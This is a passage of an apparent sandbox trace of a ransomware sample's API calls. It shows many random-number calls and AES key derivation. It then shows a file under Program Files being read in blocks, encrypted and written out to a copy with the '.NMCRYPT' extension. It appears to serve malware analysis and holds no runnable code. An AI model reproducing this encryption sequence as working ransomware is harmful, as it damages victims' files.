pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.709] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.710] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0145.711] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0145.711] CryptCreateHash (in: hProv=0x8e2f78, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447ac | out: phHash=0x1d4447ac) returned 1 [0145.711] CryptHashData (hHash=0x9ad1b8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0145.711] CryptDeriveKey (in: hProv=0x8e2f78, Algid=0x6610, hBaseData=0x9ad1b8, dwFlags=0x4, phKey=0x1d4447b0 | out: phKey=0x1d4447b0*=0x9ad638) returned 1 [0145.711] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0145.817] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0145.817] wcslen (_String="\\\\?\\") returned 0x4 [0145.817] CryptDuplicateKey (in: hKey=0x9ad638, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad1f8) returned 1 [0145.817] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0145.818] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0145.818] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=2592) returned 1 [0145.818] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0145.818] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.820] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.820] GetLastError () returned 0x0 [0145.820] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.822] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.822] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.822] GetLastError () returned 0x0 [0145.822] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.822] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.822] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.822] GetLastError () returned 0x0 [0145.823] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.823] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.823] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.823] GetLastError () returned 0x0 [0145.823] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.823] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.823] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.823] GetLastError () returned 0x0 [0145.823] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.823] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.823] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.823] GetLastError () returned 0x0 [0145.823] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.823] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.823] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.823] GetLastError () returned 0x0 [0145.823] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, 